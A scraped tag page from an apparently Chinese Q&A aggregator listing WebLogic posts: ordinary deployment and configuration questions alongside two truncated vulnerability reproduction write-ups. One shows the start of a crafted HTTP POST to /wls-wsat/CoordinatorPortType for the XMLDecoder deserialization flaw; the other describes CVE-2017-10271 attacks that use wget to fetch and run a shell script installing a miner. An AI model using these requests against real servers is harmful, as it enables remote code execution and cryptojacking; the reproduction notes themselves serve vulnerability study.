weblogic

How to deploy a JSF 2.1 webapp in Oracle Weblogic 12.1?

╄→尐↘猪︶ㄣ 提交于 2019-12-21 16:58:08
问题 I am trying to deploy a JSF 2.1 webapplication to a Weblogic 12.1 application server, but the deployment fails with the following exception <javax.enterprise.resource.webcontainer.jsf.config> <BEA-000000> <Critical error during deployment: com.sun.faces.config.ConfigurationException: CONFIGURATION FAILED! com.oracle.injection.integration.jsf.WeblogicFacesConfigResourceProvider cannot be cast to com.sun.faces.spi.ConfigurationResourceProvider at com.sun.faces.config.ConfigManager.initialize

Weblogic WLS-WebServices组件反序列化漏洞复现

情到浓时终转凉″ 提交于 2019-12-21 08:40:52
漏洞分析: 当weblogic使用WLS-WebServices组件时,该组件会调用XMLDecoder解析XML数据,由此就产生了该漏洞 影响版本: weblogic<10.3.6版本 复现过程: 依然还是用docker,输入命令: docker-compose up -d 进入该环境,访问http://192.168.80.156:7001/,出现如下界面; 抓包,修改包重新发送:发送内容如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.80.156:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 638 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext

How to set up WebLogic 10.3.3. security for JAX_WS web services?

余生长醉 提交于 2019-12-21 06:46:35
问题 I have quite simple task to accomplish - I have to set up the security for web services ( basic authentication with hardcoded in WLES user id and password). I set the web.xml (see code fragment below) but I have tough time configuring WebLogic. I added IdentityAssertionAuthenticator Authentication Provider, set it as Required, modified DefaultAuthenticator as Optional and I went to deployed application's security and set the role to "thisIsUser" and at some point it worked, but not anymore (I

ClassNotFoundException (HqlToken) when running in WebLogic

和自甴很熟 提交于 2019-12-21 04:14:34
问题 I have a .war file for an application that normally runs fine in Jetty. I'm trying to port the application to run in WebLogic, but at startup I'm getting these exceptions: ERROR:Foo - Error in named query: findBar org.hibernate.QueryException: ClassNotFoundException: org.hibernate.hql.ast.HqlToken [from Bar] at org.hibernate.hql.ast.HqlLexer.panic(HqlLexer.java:80) at antlr.CharScanner.setTokenObjectClass(CharScanner.java:340) at org.hibernate.hql.ast.HqlLexer.setTokenObjectClass(HqlLexer

WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)复现

两盒软妹~` 提交于 2019-12-20 16:09:04
WebLogic XMLDecoder 反序列化漏洞 (CVE-2017-10271) -----by backlion 0x01 漏洞说明 近日,黑客利用 WebLogic 反序列化漏洞 CVE-2017-3248 和 WebLogic WLS LS 组件的远程代码执行漏洞 CVE-2017-10271 , Oracle 官方在 2017 年 10 月份发布了该漏洞的补丁,但没有公开漏洞细节,如果企业未及时安装补丁,存在被攻击的风险。对企业服务器发起了大范围远程攻击,对大量企业的服务器造成了严重威胁, 受 影响版本: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 0x02 攻击说明 攻击者选定要攻击的目标主机后,将首先利用漏洞 CVE-2017-3248 进行攻击,无论是否成功,都将再利用 CVE-2017-10271 进行攻击。在每一次的攻击过程中,都是先针对 Windows 系统,再针对 Linux 系统。具体攻击流程如下: 1 、利用 WebLogic 反序列化漏洞( CVE-2017-3248 )调用 Linux 中的 wget 下载 shell 脚本并调用 Linux 本地 “/bin/bash” 执行 shell 脚本。( shell 脚本内容内定义了从远端下载执行 watch-smartd 挖矿程序控制细节) 2 、

Temporary Directories in WebLogic 10

折月煮酒 提交于 2019-12-20 11:17:32
问题 Whenever, WL is stopped it doesn't delete its temporary directories .. i.e. domains/mydomain/servers/myserver/tmp/_WL_TEMP_APP_DOWNLOADS /domains/mydomain/servers/myserver/tmp/_WL_user/ /domains/mydomain/servers/myserver/stage and because of this, when we deploy new application, it doesn't deploy some JSP or some classes and it keeps the old version of those files. resulting in lots of business errors + runtime error. Is it a known issue ? How can we tackle it? 回答1: In general WL will cache

Adding custom object to JNDI on Weblogic 10

南楼画角 提交于 2019-12-20 09:47:12
问题 Is it possible to add a custom object (String or URL) to JNDI using Weblogic Server Administration Console (Weblogic 10.0) or by editing server's configuration file (config.xml)? 回答1: I don't think so. Quoting Load objects in the JNDI tree: Using the Administration Console, you can load WebLogic Server J2EE services and components, such as RMI, JMS, EJBs, and JDBC Data Sources, in the JNDI tree. And indeed, I couldn't find a way to add a String or URL using the console. AFAIK, the standard

Effect of enable-call-by-reference

荒凉一梦 提交于 2019-12-20 09:38:57
问题 I get the messages <Warning> <EJB> <BEA-010202> <Call-by-reference is not enabled for the EJB 'myEjb'. The server will have better performance if it is enabled. To enable call-by-reference, set the enable-call-by-reference element to True in the weblogic-ejb-jar.xml deployment descriptor or corresponding annotation for this EJB.> and <Warning> <EJB> <BEA-012035> <The Remote interface method: 'public abstract java.util.Collection my.sessionfassade.ejb.myFassade.myMethod(java.lang.String,java

Spring MVC weblogic ClassNotFoundException

偶尔善良 提交于 2019-12-20 06:40:02
问题 I'm trying to setup a basic spring-mvc project with weblogic. I get this stacktrace weblogic.application.ModuleException: java.lang.ClassNotFoundException: org.springframework.web.servlet.DispatcherServlet at weblogic.application.internal.ExtensibleModuleWrapper.prepare(ExtensibleModuleWrapper.java:114) at weblogic.application.internal.flow.ModuleListenerInvoker.prepare(ModuleListenerInvoker.java:100) at weblogic.application.internal.flow.ModuleStateDriver$1.next(ModuleStateDriver.java:192)

Why do I get NoClassDefFoundError: java/awt/Desktop?

佐手、 提交于 2019-12-20 05:43:05
问题 I'm trying to open an URI with Swing that I get above error. What is the reason and how can I fix it? When I do it in console everything is OK but when I do in GUI I get this error. I should say that I use Weblogic as server. Code private static void open(URI uri) { if (Desktop.isDesktopSupported()) { try { Desktop.getDesktop().browse(uri); } catch (IOException e) { /* TODO: error handling */ } } else { /* TODO: error handling */ } } Stack trace: Exception in thread "AWT-EventQueue-1" java
订阅 weblogic